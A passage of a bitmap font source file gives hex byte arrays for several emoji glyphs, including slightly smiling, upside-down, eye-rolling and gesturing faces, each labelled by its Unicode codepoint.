0x0, 0x0, 0x0, 0xf, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3d, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x8e, 0x0, 0x0,
0x7, 0xff, 0x0, 0x0, 0x3, 0x87, 0x0, 0x0,
0x1f, 0xff, 0xf0, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x7f, 0x0, 0x7f, 0x0, 0x1, 0xc0, 0xe0, 0x0,
0xfc, 0x0, 0x7, 0xe0, 0x0, 0xe0, 0x78, 0x0,
0xf0, 0x0, 0x0, 0x78, 0x0, 0xe0, 0x1c, 0x0,
0x30, 0x0, 0x0, 0x18, 0x0, 0x70, 0x7, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x3, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x78, 0x0, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x38,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F642 "🙂" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x1, 0xe0, 0x0, 0x3,
0xc0, 0x0, 0xe1, 0xc0, 0x1, 0xf8, 0x0, 0x3,
0xf0, 0x0, 0x71, 0xc0, 0x1, 0xfe, 0x0, 0x3,
0xfc, 0x0, 0x3c, 0xe0, 0x0, 0xff, 0x0, 0x1,
0xfe, 0x0, 0xe, 0x70, 0x0, 0x7f, 0x80, 0x0,
0xff, 0x0, 0x7, 0x38, 0x0, 0x3f, 0xc0, 0x0,
0x7f, 0x80, 0x3, 0xb8, 0x0, 0x1f, 0xe0, 0x0,
0x3f, 0xc0, 0x0, 0xfc, 0x0, 0x7, 0xe0, 0x0,
0xf, 0xc0, 0x0, 0x7e, 0x0, 0x1, 0xe0, 0x0,
0x3, 0xc0, 0x0, 0x3f, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3d, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x8e, 0x0, 0x6,
0x0, 0x0, 0x3, 0x0, 0x3, 0x87, 0x0, 0x7,
0xc0, 0x0, 0x7, 0xc0, 0x1, 0xc1, 0xc0, 0x1,
0xf8, 0x0, 0xf, 0xc0, 0x1, 0xc0, 0xe0, 0x0,
0x3f, 0x80, 0x3f, 0x80, 0x0, 0xe0, 0x78, 0x0,
0x3, 0xff, 0xfe, 0x0, 0x0, 0xe0, 0x1c, 0x0,
0x0, 0x3f, 0xf8, 0x0, 0x0, 0x70, 0x7, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x3, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x78, 0x0, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x38,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F643 "🙃" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0x0, 0x1f, 0xfc, 0x0,
0x0, 0x38, 0xf, 0x0, 0x0, 0x7f, 0xff, 0xc0,
0x0, 0x1c, 0x7, 0x0, 0x1, 0xfc, 0x1, 0xfc,
0x0, 0x7, 0x3, 0x80, 0x3, 0xf0, 0x0, 0x1f,
0x80, 0x3, 0x83, 0x80, 0x3, 0xc0, 0x0, 0x3,
0xe0, 0x0, 0xe1, 0xc0, 0x0, 0xc0, 0x0, 0x0,
0x60, 0x0, 0x71, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3c, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x70, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0x38, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xb8, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x3, 0xc0,
0x0, 0x7, 0x80, 0x0, 0x7e, 0x0, 0x3, 0xf0,
0x0, 0x7, 0xe0, 0x0, 0x3f, 0x0, 0x3, 0xfc,
0x0, 0x7, 0xf8, 0x0, 0x3d, 0xc0, 0x1, 0xfe,
0x0, 0x3, 0xfc, 0x0, 0x1c, 0xe0, 0x0, 0xff,
0x0, 0x1, 0xfe, 0x0, 0xe, 0x70, 0x0, 0x7f,
0x80, 0x0, 0xff, 0x0, 0x7, 0x38, 0x0, 0x3f,
0xc0, 0x0, 0x7f, 0x80, 0x7, 0x8e, 0x0, 0xf,
0xc0, 0x0, 0x1f, 0x80, 0x3, 0x87, 0x0, 0x3,
0xc0, 0x0, 0x7, 0x80, 0x1, 0xc1, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x78, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x1c, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x7, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x3, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x78, 0x0, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x38,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0xe,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0xe, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xfc, 0x0, 0x0, 0x0,
/* U+1F644 "🙄" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x2, 0x0, 0x0, 0x1,
0x0, 0x7, 0x3, 0x80, 0x1f, 0xf0, 0x0, 0xf,
0xf8, 0x3, 0x83, 0x80, 0x1f, 0xfc, 0x0, 0xf,
0xfe, 0x0, 0xe1, 0xc0, 0x3f, 0xff, 0x80, 0x1f,
0xff, 0xc0, 0x71, 0xc0, 0x1f, 0xfd, 0xc0, 0xf,
0xfe, 0xe0, 0x3c, 0xe0, 0x1d, 0xfe, 0xf0, 0xf,
0xff, 0x78, 0xe, 0x70, 0xe, 0xff, 0x38, 0x7,
0x7f, 0x9c, 0x7, 0x38, 0xe, 0x3f, 0xe, 0x7,
0x1f, 0x87, 0x3, 0xb8, 0x7, 0xf, 0x7, 0x3,
0x87, 0x83, 0x80, 0xfc, 0x3, 0x80, 0x3, 0x81,
0xc0, 0x1, 0xc0, 0x7e, 0x1, 0xc0, 0x1, 0xc0,
0xe0, 0x0, 0xe0, 0x3f, 0x0, 0xe0, 0x0, 0xe0,
0x70, 0x0, 0x70, 0x1f, 0x80, 0x70, 0x0, 0x70,
0x38, 0x0, 0x38, 0xf, 0xc0, 0x1c, 0x0, 0x70,
0xe, 0x0, 0x38, 0x7, 0xe0, 0xf, 0x0, 0x78,
0x7, 0x80, 0x3c, 0x3, 0xf0, 0x3, 0xc0, 0x38,
0x1, 0xc0, 0x3c, 0x1, 0xf8, 0x0, 0xf0, 0x78,
0x0, 0x78, 0x3c, 0x0, 0xfc, 0x0, 0x3f, 0xf8,
0x0, 0x1f, 0xfc, 0x0, 0x7e, 0x0, 0x7, 0xf0,
0x0, 0x3, 0xf8, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3d, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x8e, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x87, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x78, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x1c, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x7, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x3, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x78, 0x0, 0xe0,
0x0, 0x1f, 0xff, 0xe0, 0x0, 0x38, 0x0, 0x38,
0x0, 0xf, 0xff, 0xf0, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F645 "🙅" */
0x0, 0x0, 0x0, 0x1, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0xff, 0xff, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xf0, 0x3,
0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0xf, 0x80, 0x0, 0x0, 0x0, 0x0, 0x3,
0xc0, 0x0, 0x0, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xc0, 0x0, 0x0, 0xe, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe0, 0x0, 0x0, 0x1, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x38,
0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0, 0x0,
0x7, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x0, 0x0,
0x0, 0x0, 0xe0, 0x0, 0x0, 0x0, 0xf, 0x0,
0x0, 0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x3,
0x80, 0x0, 0x0, 0x0, 0x7, 0x0, 0x0, 0x0,
0x1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x0,
0x0, 0x0, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x1c,
0x0, 0x0, 0x0, 0x38, 0x3, 0xc0, 0x1, 0xe0,
0x7, 0x0, 0x0, 0x0, 0x1c, 0x1, 0xf8, 0x0,
0xfc, 0x0, 0xe0, 0x0, 0x0, 0xf, 0x0, 0x7e,
0x0, 0x3f, 0x0, 0x3c, 0x0, 0x0, 0x3, 0x80,
0x1f, 0x80, 0xf, 0xc0, 0x7, 0x0, 0x0, 0x1,
0xc0, 0x7, 0xe0, 0x3, 0xf0, 0x0, 0xe0, 0x0,
0x0, 0x70, 0x1, 0xf8, 0x0, 0xfc, 0x0, 0x38,
0x0, 0x0, 0x38, 0x0, 0x3c, 0x0, 0x1e, 0x0,
0x7, 0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xe0, 0x0, 0xf, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3c, 0x0, 0x3, 0x80, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x0, 0x1, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x0,
0xf0, 0x7f, 0x0, 0xf, 0x80, 0x1, 0xfc, 0x1c,
0x0, 0x78, 0x3f, 0xf8, 0x7, 0xf0, 0x3, 0xff,
0x87, 0x80, 0x3c, 0x1c, 0x1f, 0x81, 0xfc, 0x7,
0xe0, 0x70, 0xf0, 0xe, 0x6, 0x0, 0xf8, 0x7f,
0x7, 0xc0, 0xc, 0x1c, 0x7, 0x81, 0x80, 0xf,
0x9f, 0xc3, 0xc0, 0x3, 0x7, 0x81, 0xc0, 0x70,
0x0, 0xf3, 0xe3, 0xc0, 0x1, 0xc0, 0xe0, 0xe0,
0xe, 0x0, 0xe, 0x1, 0xe0, 0x0, 0xe0, 0x1c,
0x38, 0x1, 0xc0, 0x1, 0xe0, 0xe0, 0x0, 0x70,
0x7, 0x1c, 0x0, 0x38, 0x0, 0x3c, 0x70, 0x0,
0x78, 0x0, 0xe7, 0x0, 0x7, 0x0, 0x3, 0xf8,
0x0, 0x38, 0x0, 0x3b, 0xc0, 0x0, 0xf0, 0x0,
0x7c, 0x0, 0x3c, 0x0, 0xe, 0xe0, 0x0, 0xe,
0x0, 0xf, 0x0, 0x1e, 0x0, 0x1, 0xf8, 0x0,
0x1, 0xc0, 0x1, 0xe0, 0xe, 0x0, 0x0, 0x7e,
0x0, 0x0, 0x3c, 0x0, 0x1e, 0xf, 0x0, 0x0,
0x1f, 0x80, 0x0, 0x3, 0x80, 0x3, 0xc7, 0x0,
0x0, 0x7, 0xe0, 0x0, 0x0, 0x70, 0x0, 0x3f,
0x80, 0x0, 0x1, 0xf8, 0x2, 0x0, 0x3e, 0x0,
0x7, 0xe0, 0x0, 0x0, 0x7e, 0x0, 0xfc, 0xff,
0xc0, 0x0, 0x7f, 0x1, 0xc0, 0x1d, 0xc0, 0x1f,
0xfe, 0x18, 0x0, 0x3, 0xff, 0xf0, 0xe, 0x70,
0x0, 0x30, 0x3, 0x0, 0x0, 0x1f, 0xf0, 0x3,
0x9c, 0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0,
0x0, 0xe3, 0x80, 0x0, 0x0, 0xe, 0x0, 0x0,
0x0, 0x0, 0x70, 0xe0, 0x0, 0x0, 0x1, 0xc0,
0x0, 0x0, 0x0, 0x3c, 0x1c, 0x0, 0x0, 0x0,
0x38, 0x0, 0x0, 0x0, 0xe, 0x3, 0x80, 0x0,
0x0, 0xf, 0x80, 0x0, 0x0, 0x7, 0x0, 0x78,
0x0, 0x0, 0xf, 0xf0, 0x0, 0x0, 0x7, 0x80,
0xf, 0x80, 0x0, 0xf, 0xcf, 0x80, 0x0, 0x7,
0xc0, 0x0, 0xfc, 0x0, 0x7f, 0xc0, 0xfe, 0x0,
0xf, 0xc0, 0x0, 0xf, 0xff, 0xff, 0x80, 0x7,
0xff, 0xff, 0xc0, 0x0, 0x0, 0x7f, 0xfc, 0x0,
0x0, 0x1f, 0xff, 0x80, 0x0,
/* U+1F646 "🙆" */
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0xf0, 0x0,
0x0, 0x0, 0x3, 0xf0, 0x0, 0x0, 0xf, 0xc0,
0x0, 0x0, 0x0, 0x3b, 0xbf, 0x0, 0x3e, 0x66,
0x0, 0x0, 0x0, 0x1, 0x8f, 0xfc, 0x3, 0xff,
0x18, 0x0, 0x0, 0x0, 0x18, 0x78, 0x70, 0x30,
0x78, 0xc0, 0x0, 0x0, 0x0, 0xc3, 0x0, 0xc3,
0x0, 0xc7, 0x0, 0x0, 0x0, 0x6, 0x0, 0x6,
0x18, 0x0, 0x18, 0x0, 0x0, 0x0, 0x70, 0x0,
0x30, 0xc0, 0x0, 0xc0, 0x0, 0x0, 0x3, 0x0,
0x1, 0x86, 0x0, 0x6, 0x0, 0x0, 0x0, 0x38,
0x0, 0x1c, 0x38, 0x0, 0x18, 0x0, 0x0, 0x3,
0x80, 0x1, 0xc0, 0xe0, 0x0, 0xe0, 0x0, 0x0,
0x38, 0x0, 0x1c, 0x3, 0x80, 0x3, 0xc0, 0x0,
0x7, 0x80, 0x3, 0xc0, 0xf, 0x0, 0xf, 0x0,
0x0, 0x78, 0x0, 0x78, 0x0, 0x3e, 0x0, 0x1c,
0x0, 0x7, 0x0, 0xf, 0x80, 0x0, 0x7c, 0x0,
0x70, 0x0, 0x30, 0x1, 0xe0, 0x0, 0x0, 0xf8,
0x1, 0xc0, 0x3, 0x80, 0x3c, 0x0, 0x0, 0x1,
0xe0, 0x6, 0x0, 0x38, 0x3, 0x80, 0x0, 0x0,
0x3, 0x80, 0x38, 0x3, 0x80, 0x38, 0x0, 0x0,
0x0, 0xe, 0x0, 0xe0, 0x18, 0x3, 0x80, 0xf,
0xfe, 0x0, 0x38, 0x3, 0x1, 0xc0, 0x38, 0x7,
0xff, 0xff, 0x0, 0xe0, 0x1c, 0xc, 0x3, 0x80,
0xfc, 0x0, 0x7e, 0x3, 0x80, 0x60, 0xe0, 0x18,
0x1e, 0x0, 0x0, 0x7c, 0xe, 0x3, 0x86, 0x1,
0x83, 0xc0, 0x0, 0x0, 0x78, 0x30, 0xc, 0x30,
0xc, 0x38, 0x0, 0x0, 0x1, 0xe1, 0xc0, 0x63,
0x0, 0xc3, 0x80, 0x0, 0x0, 0x3, 0x86, 0x1,
0x98, 0x6, 0x38, 0x0, 0x0, 0x0, 0xe, 0x30,
0xc, 0xc0, 0x63, 0x80, 0x0, 0x0, 0x0, 0x38,
0xc0, 0x66, 0x3, 0x38, 0x0, 0x0, 0x0, 0x0,
0xe6, 0x3, 0x60, 0x1b, 0x80, 0x0, 0x0, 0x0,
0x3, 0xb0, 0xf, 0x0, 0xb8, 0x0, 0x0, 0x0,
0x0, 0xf, 0xc0, 0x78, 0xd, 0x80, 0x0, 0x0,
0x0, 0x0, 0x36, 0x3, 0xc0, 0x78, 0x0, 0x70,
0x0, 0x78, 0x1, 0xf0, 0x1e, 0x3, 0xc0, 0x7,
0xc0, 0x7, 0xe0, 0x7, 0x80, 0xf0, 0x1c, 0x0,
0x3e, 0x0, 0x3f, 0x0, 0x1c, 0x7, 0x80, 0xe0,
0x1, 0xf8, 0x1, 0xf8, 0x0, 0xe0, 0x3c, 0x6,
0x0, 0xf, 0x80, 0xf, 0xc0, 0x3, 0x1, 0xe0,
0x0, 0x0, 0x7c, 0x0, 0x7e, 0x0, 0x0, 0xf,
0x0, 0x0, 0x1, 0xc0, 0x1, 0xe0, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x33, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1, 0x98, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xc, 0xc0, 0x0, 0x0, 0x40, 0x0,
0x20, 0x0, 0x0, 0x63, 0x0, 0x0, 0x7, 0x0,
0x3, 0x80, 0x0, 0x6, 0x18, 0x0, 0x0, 0x3c,
0x0, 0x78, 0x0, 0x0, 0x30, 0xc0, 0x0, 0x0,
0x7c, 0xf, 0x80, 0x0, 0x1, 0x83, 0x0, 0x0,
0x1, 0xff, 0xf0, 0x0, 0x0, 0x18, 0x1c, 0x0,
0x0, 0x1, 0xfe, 0x0, 0x0, 0x1, 0xc0, 0x60,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc, 0x3,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe0,
0xe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe,
0x0, 0x38, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe0, 0x0, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe, 0x0, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0x0, 0xe, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe, 0x0, 0x0, 0x38, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe0, 0x0, 0x0, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x1, 0xe0, 0x0,
0x0, 0x0, 0x3, 0xc0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x0, 0x78, 0x0, 0x0, 0x0, 0x7,
